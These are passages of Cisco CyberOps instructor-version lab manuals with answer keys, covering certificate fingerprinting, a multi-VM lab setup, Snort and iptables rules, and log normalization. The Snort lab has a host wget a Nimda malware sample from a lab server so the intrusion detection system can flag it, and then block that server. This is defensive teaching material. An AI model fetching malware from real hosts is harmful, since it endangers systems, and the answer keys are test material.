IENsb3VkIENvcnBvcmF0aW9uKTEdMBsGA1UEAxMUSHlkcmFudElEIFNTTCBJQ0Eg
RzIwHhcNMTcxMjA3MjIxODU1WhcNMTkxMjA3MjIyODAwWjBjMQswCQYDVQQGEwJV
UzELMAkGA1UECAwCQ0ExETAPBgNVBAcMCFNhbiBKb3NlMRwwGgYDVQQKDBNDaXNj
byBTeXN0ZW1zLCBJbmMuMRYwFAYDVQQDDA13d3cuY2lzY28uY29tMIIBIjANBgkq
yvo6dWpJdSircYy8HG0nz4+936+2waIVf1BBQXZUjNVuws74Z/eLIpl2c6tANmE0

q1i7fiWgItjDQ8rfjeX0oto6rvp8AXPjPY6X7PT1ulfhkLYnxqXHPETRwr8l5COO
MDEh95cRxATXNAlWAwLcBT7lDmrGron6rW6hDtuUPPG/rjZeZbNww5p/nT3EXX2L
Rh+m0R4j/tuvy/77YRWyp/VZhmSLrvZEYiVjM2MgCXBvqR+aQ9zWJkw+CAm5Z414
Eiv5RLctegYuBUMGTH1al9r5cuzfwEg2mNkxl4I/mtDro2kDAv7bcTm8T1LsZAO/
1bWvudsrTA8jksw+1WGAEd9bHi3ZpJPYedlL
-----END CERTIFICATE-----
[analyst@secOps ~]$
c. Now that the certificate is saved in the cisco.pem text file, use the command below to extract and display
its fingerprint:
[analyst@secOps ~]$ openssl x509 -noout -in cisco.pem -fingerprint -sha1
SHA1 Fingerprint=64:19:CA:40:E2:1B:3F:92:29:21:A9:CE:60:7D:C9:0C:39:B5:71:3E
[analyst@secOps ~]$
Note: Your fingerprint value may be different for two reasons. First, you may be using a different
operating system than the CyberOps Workstation VM. Second, certificates are regularly refreshed
changing the fingerprint value.
What hash algorithm was used by OpenSSL to calculate the fingerprint?
____________________________________________________________________________________
SHA-1
Why was that specific algorithm chosen? Does it matter?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The fingerprints acquired and shown in the table are all SHA-1. Any other algorithm used by OpenSSL
when computing the fingerprint would yield a different hash and therefore a different fingerprint,
invalidating the test.

Step 3: Compare the Fingerprints

Use Table 1 to compare the certificate fingerprint acquired directly from the Cisco HTTPS site with the one
acquired from within your network. Recall, fingerprints may change over time.
Do the fingerprints match?
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary depending on the network in use. If they are using the VM as instructed, the answer is Yes;
the VM most likely doesn’t have a false CA installed in its store.
What does it mean?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary depending on the network in use. If the fingerprints match, chances are no certificate
tampering took place and therefore, no HTTPS proxy is in operation; traffic exchanged between the local

machine and the cisco.com site are end-to-end encrypted. Non-matching fingerprints mean that someone
else has intercepted the connection, sent its own certificate to the host machine and established a new
SSL/TLS connection to cisco.com, placing itself in the middle. Because a new certificate was sent to the local
machine, the fingerprint of that new certificate is different than the certificate used by cisco.com. Traffic
between the local machine and the cisco.com site can be read by the HTTPS proxy.
Is this method 100% foolproof?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
No. While non-matching fingerprints communicates SSL/TLS traffic interception, matching fingerprints should
be handled with care. A few exceptions to consider are: 1. The CyberOps Workstation VM will likely NOT
have any enterprise-owned CA root certificates installed. In that scenario, the VM may not have its traffic
intercepted while other machines in local network do. 2. The enterprise could use dynamic rules to intercept
only selected sites.

Part 3: Challenges (Optional)

a. Check the fingerprints for the sites shown in Table-1 but using your web browser’s GUI.
Hints: Find a way to display the fingerprint through the browser’s GUI. Remember: Google is useful in
this exercise, and Windows often refers to the Fingerprint as Thumbprint.
b. Use the OpenSSL (Part 2, Steps 1 through 3) to check all the fingerprints listed in Table-1

Reflection
What would be necessary for the HTTPS proxy to work?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
The local machine would have to trust the HTTPS proxy blindly. Companies and organizations that wish to
monitor HTTPS traffic achieve this trust by installing the HTTPS proxy’s certificate into the local machine’s
root certificate store. In this scenario, the local machines will trust the HTTPS proxy, allowing it to decrypt the
traffic without any warnings.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 9 of 9 www.netacad.com
Lab – Setup a Multi-VM Environment (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Topology

Objectives
In this lab, you will set up a virtual network environment by connecting multiple virtual machines in Virtualbox.

Background / Scenario
A virtual network security sandbox or multi-VM lab environment is useful for security analysis and testing. This
multi-VM environment is a requirement for more advanced labs in this course.

Required Resources
 The CyberOps Workstation VM (cyberops_workstation.ova).
 Internet Connection
 The following .ova files for creating additional VMs: kali_linux.ova, metasploitable.ova, and
security_onion.ova. Click each link to download the files.
 Host computer with at least 8 GB of RAM and 45 GB of free disk space.
Note: If your computer only has 8 GB of RAM, make sure you have no other applications open except for
a PDF reader program to refer to this lab. VM Settings

Disk
Virtual Machine OS OVA Size RAM Username Password
Space

CyberOps Workstation VM Arch Linux 2.23 GB 7 GB 1 GB analyst cyberops

Kali Kali Linux 3.07 GB 10 GB 1 GB root cyberops
Metasploitable Ubuntu Linux 851 MB 8 GB 512 MB msfadmin msfadmin
Security Onion Ubuntu Linux 2.35 GB 10 GB 4 GB analyst cyberops
Totals 8.5 GB 45 GB 6.5 GB

Note: If you have typed the username incorrectly for the Kali VM, click Cancel to input the correct username.

Step 1: Import appliance virtual machines into VirtualBox.

VirtualBox is able to host and run multiple virtual machines. Along with the CyberOps Workstation VM that
has already been installed, you will import additional virtual machines into VirtualBox to create a virtual
network.
Note: The screen may look different depending on your version of VirtualBox.
a. Use the file menu in VirtualBox to install Kali Linux: File > Import Appliance, then navigate to the
kali_linux.ova file and click Next.

b. A new window will appear presenting the settings suggested in the OVA archive. Check the "Reinitialize
the MAC address of all network cards" box at bottom of the window. Leave all other settings as default.
Click Import.

c. After the import is complete, VirtualBox will show the new Kali VM. Your Kali Linux VM file name might be
different than the graphic shown below.

d. Now import the Metasploitable and the Security Onion VMs using the same method.

e. All four VMs are now shown in VirtualBox.

Step 2: Network the Virtual Machines to create a virtual lab.

In this part, you will ensure that networking is configured between the VMs. In VirtualBox, a VM’s network
adapter can be in bridged mode (visible on the network like any other physical device), NAT mode (visible on
the network but in a separate IP address space), or internal mode (only visible to other virtual machines with
the same internal name or virtual local area network [VLAN]).
Examine the network settings for each virtual machine and take note of how the network adapter modes and
names place the VMs in different VLANs.
a. Kali has one network adaptor using internal network mode in the internet VLAN. Notice how this
corresponds to the network diagram on page 1.

b. Metasploitable has two network adaptors using internal network mode, Adapter 1 corresponds to this
lab and is in the dmz VLAN. While Adapter 2 is displayed by VirtualBox, it is not used in this topology and
it can be ignored.

c. Security Onion has four network adaptors, three using internal network mode and one using NAT mode
which could be used to reach the internet. Security Onion connects all of the VMs in the virtual network,
with a network adapter in each of the VLANs (inside, dmz, and internet).

d. CyberOps Workstation VM is in bridged mode. It is not in an internal network with the other VMs. You will
need to change the network adapter next.

e. Select the CyberOps Workstation VM in VirtualBox and click Settings. Select Network and change
Adapter 1 to internal network, with the name inside. Click OK.

f. Now that the network adapter is in the right internal network or VLAN, launch the CyberOps Workstation
VM and log in. You will need to change the IP address settings to communicate on the virtual network.
g. Open a command prompt and examine the contents of the scripts folder inside the
lab.support.files/scripts folder.
[analyst@secOs~]$ ls lab.support.files/scripts
configure_as_dhcp.sh cyops.mn start_ELK.sh
configure_as_static.sh fw_rules start_miniedit.sh
cyberops_extended_topo_no_fw.py mal_server_start.sh start_pox.sh
cyberops_extended_topo.py net_configuration_files start_snort.sh
cyberops_topo.py reg_server_start.sh start_tftpd.sh
[analyst@secOps ~]$
h. The script configure_as_dhcp.sh is used to configure the network interface to request an IP address
from a DHCP server. This is the default setting for the CyberOps Workstation VM. To configure it for a
multi-VM environment, you will need to run the configure_as_static.sh script. This will configure the
network interface with the static IP address 192.168.0.11 and a default gateway of 192.168.0.1, which is
the Security Onion VM. The Security Onion VM is responsible for routing between the Inside, DMZ, and
Internet networks. Run the configure_as_static.sh script and enter the password (if prompted) to set the
IP address to 192.168.0.11 in the virtual network.
[analyst@secOs~]$ sudo ./lab.support.files/scripts/configure_as_static.sh
[sudo] password for analyst:
Configuring the NIC as:

IP: 192.168.0.11/24
GW: 192.168.0.1

IP Configuration successful.

[analyst@secOps ~]$
Note: If you need to use CyberOps Workstation VM as a stand-alone environment with access to the
Internet, change the network adapter back to bridged mode and run the configure_as_dhcp.sh script.
i. Return to VirtualBox and power on the other VMs: Kali Linux, Metasploitable, and Security Onion. Refer
to the VM Settings table for username and password information.
Note: If necessary, use the right control key to unlock the cursor to navigate between windows.
j. When all of the VMs are running, ping from the CyberOps Workstation VM to the Metasploitable and Kali
Linux VMs. Use Ctrl+C to stop the ping.
[analyst@secOps ~]$ ping 209.165.200.235
PING 209.165.200.235 (209.165.200.235) 56(84) bytes of data.
64 bytes from 209.165.200.235: icmp_seq=1 ttl=63 time=1.16 ms
64 bytes from 209.165.200.235: icmp_seq=2 ttl=63 time=0.399 ms
64 bytes from 209.165.200.235: icmp_seq=3 ttl=63 time=0.379 ms
^C
--- 209.165.200.235 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 0.379/0.646/1.162/0.365 ms
[analyst@secOps ~]$ ping 209.165.201.17
PING 209.165.201.17 (209.165.201.17) 56(84) bytes of data.
64 bytes from 209.165.201.17: icmp_seq=1 ttl=63 time=0.539 ms
64 bytes from 209.165.201.17: icmp_seq=2 ttl=63 time=0.531 ms
64 bytes from 209.165.201.17: icmp_seq=3 ttl=63 time=0.567 ms
64 bytes from 209.165.201.17: icmp_seq=4 ttl=63 time=0.408 ms
64 bytes from 209.165.201.17: icmp_seq=5 ttl=63 time=0.431 ms
^C
--- 209.165.201.17 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4065ms
rtt min/avg/max/mdev = 0.408/0.495/0.567/0.064 ms
[analyst@secOps ~]$
k. Close the terminal window when finished.

Step 3: Shut down the VMs.

a. For each VM, click File > Close.

b. Click the Save the machine state radio button and click OK. The next time you start the virtual machine,
you will be able to resume working in the operating system in its current state.

The other two options are:

Send the shutdown signal: simulates pressing the power button on a physical computer
Power off the machine: simulates pulling the plug on a physical computer

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 7 of 7 www.netacad.com
Lab – Snort and Firewall Rules (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Topology

Objectives
Part 1: Preparing the Virtual Environment
Part 2: Firewall and IDS Logs
Part 3: Terminate and Clear Mininet Process

Background / Scenario
In a secure production network, network alerts are generated by various types of devices such as security
appliances, firewalls, IPS devices, routers, switches, servers, and more. The problem is that not all alerts are
created equally. For example, alerts generated by a server and alerts generated by a firewall will be different
and vary in content and format.
In this lab, to get familiar with firewall rules and IDS signatures.

Required Resources
 CyberOps Workstation VM
 Internet connection
Note: In this lab, the CyberOps Workstation VM is a container for holding the Mininet environment shown in
the Topology. If a memory error is received in an attempt to run any command, quit out of the step, go to the
VM settings, and increase the memory. The default is 1 GB; try 2GB.

Part 1: Preparing the Virtual Environment

a. Launch Oracle VirtualBox and change the CyberOps Workstation for Bridged mode, if necessary.
Select Machine > Settings > Network. Under Attached To, select Bridged Adapter (or if you are using
WiFi with a proxy, you may need NAT adapter) and click OK.
b. Launch the CyberOps Workstation VM, open a terminal and configure its network by executing the
configure_as_dhcp.sh script.
Because the script requires super-user privileges, provide the password for the user analyst.
[analyst@secOps ~]$ sudo ./lab.support.files/scripts/configure_as_dhcp.sh
[sudo] password for analyst:
[analyst@secOps ~]$
c. Use the ifconfig command to verify CyberOps Workstation VM now has an IP address on your local
network. You can also test connectivity to a public webserver by pinging www.cisco.com. Use Ctrl+C to
stop the pings.
[analyst@secOps ~]$ ping www.cisco.com
PING e2867.dsca.akamaiedge.net (23.204.15.199) 56(84) bytes of data.
64 bytes from a23-204-15-199.deploy.static.akamaitechnologies.com
(23.204.15.199): icmp_seq=1 ttl=54 time=28.4 ms
64 bytes from a23-204-15-199.deploy.static.akamaitechnologies.com
(23.204.15.199): icmp_seq=2 ttl=54 time=35.5 ms
^C
--- e2867.dsca.akamaiedge.net ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 28.446/32.020/35.595/3.578 ms

Part 2: Firewall and IDS Logs

Firewalls and Intrusion Detection Systems (IDS) are often deployed to partially automate the traffic monitoring
task. Both firewalls and IDSs match incoming traffic against administrative rules. Firewalls usually compare
the packet header against a rule set while IDSs often use the packet payload for rule set comparison.
Because firewalls and IDSs apply the pre-defined rules to different portions of the IP packet, IDS and firewall
rules have different structures.
While there is a difference in rule structure, some similarities between the components of the rules remain.
For example, both firewall and IDS rules contain matching components and action components. Actions are
taken after a match is found.
 Matching component - specifies the packet elements of interest, such as: packet source; the packet
destination; transport layer protocols and ports; and data included in the packet payload.
 Action component - specifies what should be done with that packet that matches a component, such as:
accept and forward the packet; drop the packet; or send the packet to a secondary rule set for further
inspection.

A common firewall design is to drop packets by default while manually specifying what traffic should be
allowed. Known as dropping-by-default, this design has the advantage protecting the network from unknown
protocols and attacks. As part of this design, it is common to log the events of dropped packets since these
are packets that were not explicitly allowed and therefore, infringe on the organization’s policies. Such events
should be recorded for future analysis.

Step 1: Real-Time IDS Log Monitoring

a. From the CyberOps Workstation VM, run the script to start mininet.
[analyst@secOps ~]$ sudo
./lab.support.files/scripts/cyberops_extended_topo_no_fw.py
[sudo] password for analyst:
*** Adding controller
*** Add switches
*** Add hosts
*** Add links
*** Starting network
*** Configuring hosts
R1 R4 H1 H2 H3 H4 H5 H6 H7 H8 H9 H10 H11
*** Starting controllers
*** Starting switches
*** Add routes
*** Post configure switches and hosts
*** Starting CLI:
mininet>
The mininet prompt should be displayed, indicating mininet is ready for commands.
b. From the mininet prompt, open a shell on R1 using the command below:
mininet> xterm R1
mininet>
The R1 shell opens in a terminal window with black text and white background. What user is logged into
that shell? What is the indicator of this?
____________________________________________________________________________________
____________________________________________________________________________________
The root user. This is indicated by the # sign after the prompt.
c. From R1’s shell, start the Linux-based IDS, Snort.
[root@secOps analyst]# ./lab.support.files/scripts/start_snort.sh
Running in IDS mode
--== Initializing Snort ==--
Initializing Output Plugins!
Initializing Preprocessors!
Initializing Plug-ins!
Parsing Rules file "/etc/snort/snort.conf"
<output omitted>
Note: You will not see a prompt as Snort is now running in this window. If for any reason, Snort stops
running and the [root@secOps analysts]# prompt is displayed, rerun the script to launch Snort. Snort
must be running in order to capture alerts later in the lab.

d. From the CyberOps Workstation VM mininet prompt, open shells for hosts H5 and H10.
mininet> xterm H5
mininet> xterm H10
mininet>
e. H10 will simulate a server on the Internet that is hosting malware. On H10, run the mal_server_start.sh
script to start the server.
[root@secOps analyst]# ./lab.support.files/scripts/mal_server_start.sh
[root@secOps analyst]#
f. On H10, use netstat with the -tunpa options to verify that the web server is running. When used as
shown below, netstat lists all ports currently assigned to services:
[root@secOps analyst]# netstat -tunpa
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
PID/Program name
tcp 0 0 0.0.0.0:6666 0.0.0.0:* LISTEN
1839/nginx: master
[root@secOps analyst]#
As seen by the output above, the lightweight webserver nginx is running and listening to connections on
port TCP 6666.

g. In the R1 terminal window, an instance of Snort is running. To enter more commands on R1, open
another R1 terminal by entering the xterm R1 again in the CyberOps Workstation VM terminal window,
as shown below. You may also want to arrange the terminal windows so that you can see and interact
with each device. The figure below shows an effective arrangement for the rest of this lab.

h. In the new R1 terminal tab, run the tail command with the -f option to monitor the /var/log/snort/alert file
in real-time. This file is where snort is configured to record alerts.
[root@sec0ps analyst]# tail -f /var/log/snort/alert
Because no alerts were yet recorded, the log should be empty. However, if you have run this lab before,
old alert entries may be shown. In either case, you will not receive a prompt after typing this command.
This window will display alerts as they happen.
i. From H5, use the wget command to download a file named W32.Nimda.Amm.exe. Designed to
download content via HTTP, wget is a great tool for downloading files from web servers directly from the
command line.
[root@secOps analyst]# wget 209.165.202.133:6666/W32.Nimda.Amm.exe
--2017-04-28 17:00:04-- http://209.165.202.133:6666/W32.Nimda.Amm.exe
Connecting to 209.165.202.133:6666... connected.
HTTP request sent, awaiting response... 200 OK

Length: 345088 (337K) [application/octet-stream]

Saving to: 'W32.Nimda.Amm.exe'

W32.Nimda.Amm.exe 100%[==========================================>] 337.00K

--.-KB/s in 0.02s

2017-04-28 17:00:04 (16.4 MB/s) - 'W32.Nimda.Amm.exe' saved [345088/345088]

[root@secOps analyst]#
What port is used when communicating with the malware web server? What is the indicator?
____________________________________________________________________________________
____________________________________________________________________________________
Port 6666. The port was specified in the URL, after the : separator.
Was the file completely downloaded? ___________________________________________ Yes
Did the IDS generate any alerts related to the file download? ________________________ Yes
j. As the malicious file was transiting R1, the IDS, Snort, was able to inspect its payload. The payload
matched at least one of the signatures configured in Snort and triggered an alert on the second R1
terminal window (the tab where tail -f is running). The alert entry is show below. Your timestamp will be
different:
04/28-17:00:04.092153 [**] [1:1000003:0] Malicious Server Hit! [**] [Priority: 0]
{TCP} 209.165.200.235:34484 -> 209.165.202.133:6666
Based on the alert shown above, what was the source and destination IPv4 addresses used in the
transaction?
____________________________________________________________________________________
____________________________________________________________________________________
Source IP: 209.165.200.235; Destination IP: 209.165.202.133.
Based on the alert shown above, what was the source and destination ports used in the transaction?
____________________________________________________________________________________
____________________________________________________________________________________
Source port: 34484; Destination port: 6666. (Note: the source port will vary).
Based on the alert shown above, when did the download take place?
____________________________________________________________________________________
____________________________________________________________________________________
April 28th, 2017. Around 5pm for the example, but the student’s answer will be different.
Based on the alert shown above, what was the message recorded by the IDS signature?
____________________________________________________________________________________
____________________________________________________________________________________
“Malicious Server Hit!”

On H5, use the tcpdump command to capture the event and download the malware file again so you can
capture the transaction. Issue the following command below start the packet capture:
[root@secOps analyst]# tcpdump –i H5-eth0 –w nimda.download.pcap &
[1] 5633
[root@secOps analyst]# tcpdump: listening on H5-eth0, link-type EN10MB (Ethernet),
capture size 262144 bytes
The command above instructs tcpdump to capture packets on interface H5-eth0 and save the capture to
a file named nimda.download.pcap.
The & symbol at the end tells the shell to execute tcpdump in the background. Without this symbol,
tcpdump would make the terminal unusable while it was running. Notice the [1] 5633; it indicates one
process was sent to background and its process ID (PID) is 5366. Your PID will most likely be different.
k. Press ENTER a few times to regain control of the shell while tcpdump runs in background.
l. Now that tcpdump is capturing packets, download the malware again. On H5, re-run the command or
use the up arrow to recall it from the command history facility.
[root@secOps analyst]# wget 209.165.202.133:6666/W32.Nimda.Amm.exe
--2017-05-02 10:26:50-- http://209.165.202.133:6666/W32.Nimda.Amm.exe
Connecting to 209.165.202.133:6666... connected.
HTTP request sent, awaiting response... 200 OK
Length: 345088 (337K) [application/octet-stream]
Saving to: 'W32.Nimda.Amm.exe'

W32.Nimda.Amm.exe 100%[===================>] 337.00K --.-KB/s in 0.003s

2017-05-02 10:26:50 (105 MB/s) - 'W32.Nimda.Amm.exe' saved [345088/345088]

m. Stop the capture by bringing tcpdump to foreground with the fg command. Because tcpdump was the
only process sent to background, there is no need to specify the PID. Stop the tcpdump process with
Ctrl+C. The tcpdump process stops and displays a summary of the capture. The number of packets may
be different for your capture.
[root@secOps analyst]# fg
tcpdump -i h5-eth0 -w nimda.download.pcap
^C316 packets captured
316 packets received by filter
0 packets dropped by kernel
[root@secOps analyst]#
n. On H5, Use the ls command to verify the pcap file was in fact saved to disk and has size greater than
zero:
[root@secOps analyst]# ls -l
total 1400
drwxr-xr-x 2 analyst analyst 4096 Sep 26 2014 Desktop
drwx------ 3 analyst analyst 4096 Jul 14 11:28 Downloads
drwxr-xr-x 8 analyst analyst 4096 Jul 25 16:27 lab.support.files
-rw-r--r-- 1 root root 371784 Aug 17 14:48 nimda.download.pcap
drwxr-xr-x 2 analyst analyst 4096 Mar 3 15:56 second_drive
-rw-r--r-- 1 root root 345088 Apr 14 15:17 W32.Nimda.Amm.exe
-rw-r--r-- 1 root root 345088 Apr 14 15:17 W32.Nimda.Amm.exe.1
[root@secOps analyst]#

Note: Your directory list may have a different mix of files, but you should still see the
nimda.download.pcap file.
How can be this PCAP file be useful to the security analyst?
____________________________________________________________________________________
____________________________________________________________________________________
PCAP files contain the packets related to the traffic seen by the capturing NIC. In that way, the PCAP is
very useful to re-retrace network events such as communication to malicious end points. Tools such as
Wireshark can be used to facilitate PCAP analysis.
Note: The analysis of the PCAP file will be performed in another lab.

Step 2: Tuning Firewall Rules Based on IDS Alerts

In Step 1, you started an Internet-based malicious server. To keep other users from reaching that server, it is
recommended to block it in the edge firewall.
In this lab’s topology, R1 is not only running an IDS but also a very popular Linux-based firewall called
iptables. In this step, you will block traffic to the malicious server identified in Step 1 by editing the firewall
rules currently present in R1.
Note: While a comprehensive study of iptables is beyond the scope of this course, iptables basic logic and
rule structure is fairly straight-forward.
The firewall iptables uses the concepts of chains and rules to filter traffic.
Traffic entering the firewall and destined to the firewall device itself is handled by the INPUT chain. Examples
of this traffic are ping packets coming from any other device on any networks and sent to any one of the
firewall’s interfaces.
Traffic originated in the firewall device itself and destined to somewhere else, is handled by the OUTPUT
chain. Examples of this traffic are ping responses generated by the firewall device itself.
Traffic originated somewhere else and passing through the firewall device is handled by the FORWARD
chain. Examples of this traffic are packets being routed by the firewall.
Each chain can have its own set of independent rules specifying how traffic is to be filtered for that chain. A
chain can have practically any number of rules, including no rule at all.
Rules are created to check specific characteristics of packets, allowing administrators to create very
comprehensive filters. If a packet doesn’t match a rule, the firewall moves on to the next rule and checks
again. If a match is found, the firewall takes the action defined in the matching rule. If all rules in a chain have
been checked and yet no match was found, the firewall takes the action specified in the chain’s policy, usually
allow the packet to flow through or deny it.
a. In the CyberOps Workstation VM, start a third R1 terminal window.
mininet > xterm R1
b. In the new R1 terminal window, use the iptables command to list the chains and their rules currently in
use:
[root@secOps ~]# iptables -L -v
Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain FORWARD (policy ACCEPT 6 packets, 504 bytes)

pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)

pkts bytes target prot opt in out source destination

[root@secOps ~]#
What chains are currently in use by R1?
____________________________________________________________________________________
INPUT, OUTPUT and FORWARD
c. Connections to the malicious server generate packets that must transverse the iptables firewall on R1.
Packets traversing the firewall are handled by the FORWARD rule and therefore, that is the chain that will
receive the blocking rule. To keep user computers from connecting to the malicious server identified in
Step 1, add the following rule to the FORWARD chain on R1:
[root@secOps ~]# iptables -I FORWARD -p tcp -d 209.165.202.133 --dport 6666 -
j DROP
[root@secOps ~]#
Where:
o -I FORWARD: inserts a new rule in the FORWARD chain.
o -p tcp: specifies the TCP protocol.
o -d 209.165.202.133: specifies the packet’s destination
o --dport 6666: specifies the destination port
o -j DROP: set the action to drop.
d. Use the iptables command again to ensure the rule was added to the FORWARD chain. The CyberOps
Workstation VM may take a few seconds to generate the output:
[root@secOps analyst]# iptables -L -v
Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)

pkts bytes target prot opt in out source destination
0 0 DROP tcp -- any any anywhere 209.165.202.133
tcp dpt:6666

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)

pkts bytes target prot opt in out source destination
[root@secOps analyst]#
e. On H5, try to download the file again:
[root@secOps analyst]# wget 209.165.202.133:6666/W32.Nimda.Amm.exe
--2017-05-01 14:42:37-- http://209.165.202.133:6666/W32.Nimda.Amm.exe
Connecting to 209.165.202.133:6666... failed: Connection timed out.
Retrying.

--2017-05-01 14:44:47-- (try: 2) http://209.165.202.133:6666/W32.Nimda.Amm.exe

Connecting to 209.165.202.133:6666... failed: Connection timed out.
Retrying.

Enter Ctrl+C to cancel the download, if necessary. Was the download successful this time? Explain.
____________________________________________________________________________________
____________________________________________________________________________________
No. The firewall is blocking connections to the malware hosting server.
What would be a more aggressive but also valid approach when blocking the offending server?
____________________________________________________________________________________
____________________________________________________________________________________
Instead of specifying IP, protocol and port, a rule could simply block the server’s IP address. This would
completely cut access to that server from the internal network.

Part 3: Terminate and Clear Mininet Process

a. Navigate to the terminal used to start Mininet. Terminate the Mininet by entering quit in the main
CyberOps VM terminal window.
b. After quitting Mininet, clean up the processes started by Mininet. Enter the password cyberops when
prompted.
[analyst@secOps scripts]$ sudo mn –c
[sudo] password for analyst:

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 10 of 10 www.netacad.com
Lab - Convert Data into a Universal Format (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Normalize Timestamps in a Log File
Part 2: Normalize Timestamps in an Apache Log File
Part 3: Log File Preparation in Security Onion

Background / Scenario
This lab will prepare students to learn where log files are located and how to manipulate and view log files.
Log entries are generated by network devices, operating systems, applications, and various types of
programmable devices. A file containing a time-sequenced stream of log entries is called a log file.
By nature, log files record events that are relevant to the source. The syntax and format of data within log
messages are often defined by the application developer.
Therefore, the terminology used in the log entries often varies from source to source. For example, depending
on the source, the terms login, logon, authentication event, and user connection, may all appear in log entries
to describe a successful user authentication to a server.
It is often desirable to have a consistent and uniform terminology in logs generated by different sources. This
is especially true when all log files are being collected by a centralized point.
The term normalization refers to the process of converting parts of a message, in this case a log entry, to a
common format.
In this lab, you will use command line tools to manually normalize log entries. In Part 2, the timestamp field
will be normalized. In Part 3, the IPv6 field will be normalized.
Note: While numerous plugins exist to perform log normalization, it is important to understand the basics
behind the normalization process.

Required Resources
 CyberOps Workstation VM
 Security Onion VM

Part 1: Normalize Timestamps in a Log File

Timestamps are used in log entries to specify when the recorded event took place. While it is best practice to
record timestamps in UTC, the format of the timestamp varies from log source to log source. There are two
common timestamp formats, known as Unix Epoch and Human Readable.
Unix Epoch timestamps record time by measuring the number of seconds that have passed since January 1st
1970.
Human Readable timestamps record time by representing separate values for year, month, day, hour, minute,
and second.
The Human Readable Wed, 28 Jun 2017 13:27:18 GMT timestamp is the same as 1498656439 in Unix
Epoch.

From a programmability stand point, it is much easier to work with Epoch as it allows for easier addition and
subtraction operations. From an analysis perspective; however, Human Readable timestamps are much
easier to interpret.
Converting Epoch to Human Readable Timestamps with AWK
AWK is a programming language designed to manipulate text files. It is very powerful and especially useful
when handling text files where the lines contain multiple fields, separated by a delimiter character. Log files
contain one entry per line and are formatted as delimiter-separated fields, making AWK a great tool for
normalizing.
Consider the applicationX_in_epoch.log file below. The source of the log file is not relevant.
2|Z|1219071600|AF|0
3|N|1219158000|AF|89
4|N|1220799600|AS|12
1|Z|1220886000|AS|67
5|N|1220972400|EU|23
6|R|1221058800|OC|89

The log file above was generated by application X. The relevant aspects of the file are:
o The columns are separated, or delimited, by the | character. Therefore, the file has five columns.
o The third column contains timestamps in Unix Epoch.
o The file has an extra line at the end. This will be important later in the lab.
Assume that a log analyst needed to convert the timestamps to the Human Readable format. Follow the steps
below to use AWK to easily perform the manual conversion:
a. Launch the CyberOps Workstation VM and then launch a terminal window.
b. Use the cd command to change to the /home/analyst/lab.support.files/ directory. A copy of the file
shown above is stored there.
[analyst@secOps ~]$ cd ./lab.support.files/
[analyst@secOps lab.support.files]$ ls -l
total 580
-rw-r--r-- 1 analyst analyst 649 Jun 28 18:34 apache_in_epoch.log
-rw-r--r-- 1 analyst analyst 126 Jun 28 11:13 applicationX_in_epoch.log
drwxr-xr-x 4 analyst analyst 4096 Aug 7 15:29 attack_scripts
-rw-r--r-- 1 analyst analyst 102 Jul 20 09:37 confidential.txt
<output omitted>
[analyst@secOps lab.support.files]$
c. Issue the following AWK command to convert and print the result on the terminal:
Note: It is easy to make a typing error in the following script. Consider copying the script out to a text
editor to remove the extra line breaks. Then copy the script from the text editor into the CyberOps
Workstation VM terminal window. However, be sure to study the script explanation below to learn how
this script modifies the timestamp field.
[analyst@secOps lab.support.files]$ awk 'BEGIN
{FS=OFS="|"}{$3=strftime("%c",$3)} {print}' applicationX_in_epoch.log
2|Z|Mon 18 Aug 2008 11:00:00 AM EDT|AF|0
3|N|Tue 19 Aug 2008 11:00:00 AM EDT|AF|89
4|N|Sun 07 Sep 2008 11:00:00 AM EDT|AS|12
1|Z|Mon 08 Sep 2008 11:00:00 AM EDT|AS|67

5|N|Tue 09 Sep 2008 11:00:00 AM EDT|EU|23

6|R|Wed 10 Sep 2008 11:00:00 AM EDT|OC|89
||Wed 31 Dec 1969 07:00:00 PM EST
[analyst@secOps lab.support.files]$
The command above is an AWK script. It may seem complicated. The main structure of the AWK script
above is as follows:
 awk – This invokes the AWK interpreter.
 ‘BEGIN – This defines the beginning of the script.
 {} – This defines actions to be taken in each line of the input text file. An AWK script can have
several actions.
 FS = OFS = “|” – This defines the field separator (i.e., delimiter) as the bar (|) symbol. Different
text files may use different delimiting characters to separate fields. This operator allows the user
to define what character is used as the field separator in the current text file.
 $3 – This refers to the value in the third column of the current line. In the
applicationX_in_epoch.log, the third column contains the timestamp in epoch to be converted.
 strftime - This is an AWK internal function designed to work with time. The %c and $3 in between
parenthesis are the parameters passed to strftime.
 applicationX_in_epoch.log – This is the input text file to be loaded and used. Because you are
already in the lab.support.files directory, you do not need to add path information,
/home/analyst/lab.support.files/applicationX_in_epoch.log.
The first script action, defined in the first set of curly brackets is to define the field separator character as
the “|”. Then, in the second set of curly brackets, it rewrites the third column of each line with the result of
the execution of the strftime() function. strftime() is an internal AWK function created to handle time
conversion. Notice that the script tells the function to use the contents of the third column of each line
before the change ($3) and to format the output (%c).
Were the Unix Epoch timestamps converted to Human Readable format? Were the other fields modified?
